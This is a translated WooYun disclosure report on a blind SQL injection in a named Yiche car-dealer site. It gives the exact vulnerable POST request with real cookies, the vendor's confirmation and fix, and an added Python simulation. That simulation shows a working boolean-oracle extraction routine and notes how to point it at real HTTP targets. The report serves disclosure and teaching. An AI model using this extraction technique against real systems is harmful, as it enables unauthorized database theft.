
Vulnerability Summary

Defect ID: wooyun-2015-0131490

Title: SQL injection vulnerability in a Yiche (易车) system

Vendor: Yiche (易车)

Author: BeenQuiver

Submitted: 2015-08-04 11:47

Fixed: 2015-09-18 12:20

Published: 2015-09-18 12:20

Type: SQL injection

Severity (self-assessed): High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-08-04: Details sent to the vendor; awaiting vendor handling
2015-08-04: Vendor confirmed; details disclosed to the vendor only
2015-08-14: Details disclosed to core white hats and domain experts
2015-08-24: Details disclosed to regular white hats
2015-09-03: Details disclosed to intern white hats
2015-09-18: Details disclosed to the public

Brief description:

SQL injection in one of the vendor's systems.

Detailed description:

http://www.dfyl-luxgen.com/index.php/lifehouse
This page issues a POST request that is injectable: boolean-based blind SQL injection via the cid parameter. The request captured from the page is below.
POST /index.php/api/searchgetdelaers?time=0.40741090243682265 HTTP/1.1
Host: www.dfyl-luxgen.com
Proxy-Connection: keep-alive
Content-Length: 7
Accept: */*
Origin: http://www.dfyl-luxgen.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.dfyl-luxgen.com/index.php/lifehouse
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _gat=1; CIGDCSCD=1438657931; CIGDCJZMP=1438657931; _ga=GA1.2.1750492344.1438657927; Hm_lvt_7a357b718ec26e4b61ecd930ef7cf199=1438657970; Hm_lpvt_7a357b718ec26e4b61ecd930ef7cf199=1438657988; pt_s_2e2ebe5f=vt=1438657987948&cad=; dmt43=6%7C0%7C0%7Cwww.dfyl-luxgen.com%2Findex.php%2Flifehouse%7Cwww.dfyl-luxgen.com%2Findex.php%2Ftestdrive; dmts43=1; dm43=1%7C1438657988%7C0%7C%7C%7C%7C%7C1438657931%7C1438657931%7C0%7C1438657931%7C923042015080410550655c0298aaea25%7C0%7C%7C; dm_rff43=%5B%5Dwww.dfyl-luxgen.com%252F%5B%5D0%5B%5D; dcad43=; dc_search43=; CIGDCID=923042015080410550655c0298aaea25; CIGDCTP=0; CIGDCTS=0; CIGDCAD=; CIGDCSE=; pt_t_2e2ebe5f=; pt_2e2ebe5f=uid=Lr1vl0CLEBpUrCrGC86WzQ&nid=0&vid=-JQ4k28PQm2CAeQ5V8UkBA&vn=1&pvn=5&sact=1438658043603&to_flag=0&pl=eyp6e51xzM0Z9s-N8FvVJQ*pt*1438657987948
cid=201
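The boolean-based blind injection described above, as an added example that is not part of the original report: a Python simulation of the dealer lookup behind the searchgetdelaers endpoint, with an in-memory SQLite table standing in for the real database (the schema, table names and secret value are constructed for the example, not taken from the site). It shows why `cid=201 AND 1=1` versus `cid=201 AND 1=2` leaks one bit per request, uses that oracle to recover a string character by character with a binary search on its code point, and contrasts the concatenated query with a parameterized one that treats the same payload as a non-integer and returns nothing.

```python
import sqlite3


def build_db():
    # Constructed stand-in for the site's database (hypothetical schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dealers (id INTEGER, cid INTEGER, name TEXT)")
    db.executemany(
        "INSERT INTO dealers VALUES (?, ?, ?)",
        [(1, 201, "Dealer A"), (2, 201, "Dealer B"), (3, 305, "Dealer C")],
    )
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, secret TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'Tq9!')")
    return db


def search_vulnerable(db, cid):
    # Vulnerable pattern: the raw POST value is concatenated into the SQL text,
    # so anything after the number is parsed as SQL, not as data.
    sql = "SELECT name FROM dealers WHERE cid = " + cid
    return [row[0] for row in db.execute(sql)]


def search_fixed(db, cid):
    # Hardened pattern: validate the type, then bind the value as a parameter.
    try:
        cid_int = int(cid)
    except ValueError:
        return []
    rows = db.execute("SELECT name FROM dealers WHERE cid = ?", (cid_int,))
    return [row[0] for row in rows]


def oracle(db, condition):
    # Boolean oracle: the dealer list is non-empty only when the injected
    # condition evaluates to true, exactly like an HTTP response that differs
    # between "cid=201 AND 1=1" and "cid=201 AND 1=2".
    return len(search_vulnerable(db, "201 AND (" + condition + ")")) > 0


def extract_string(db, subquery, max_len=32):
    # Recover the result of a scalar subquery one character at a time.
    # Each position costs about seven oracle queries (binary search over 0..127).
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(db, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(db, f"unicode(substr(({subquery}), {pos}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    print("normal:      ", search_vulnerable(db, "201"))
    print("AND 1=1:     ", search_vulnerable(db, "201 AND 1=1"))
    print("AND 1=2:     ", search_vulnerable(db, "201 AND 1=2"))
    print("extracted:   ", extract_string(db, "SELECT secret FROM users WHERE username='admin'"))
    print("fixed query: ", search_fixed(db, "201 AND 1=1"))
```

Against a real target the oracle would compare HTTP responses (body length or a marker string) instead of list lengths, and the subquery would be written in the target's SQL dialect; the inference loop is the same.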

Proof of vulnerability:

(screenshot) 2015-08-04_113206.png

(screenshot) 2015-08-04_113241.png

Suggested fix:

Filter the cid parameter. Casting it to an integer and binding it in a parameterized query, rather than concatenating it into the SQL string, removes the injection entirely.

Copyright notice: please credit the source when reposting: BeenQuiver@WooYun


Vulnerability Response

Vendor response:

Severity: Medium

Rank: 5

Confirmed: 2015-08-04 12:19

Vendor reply:

Many thanks for your help to Yiche; we will fix it as soon as possible.

Latest status:

2015-08-05: Fixed. Many thanks for your support of Yiche.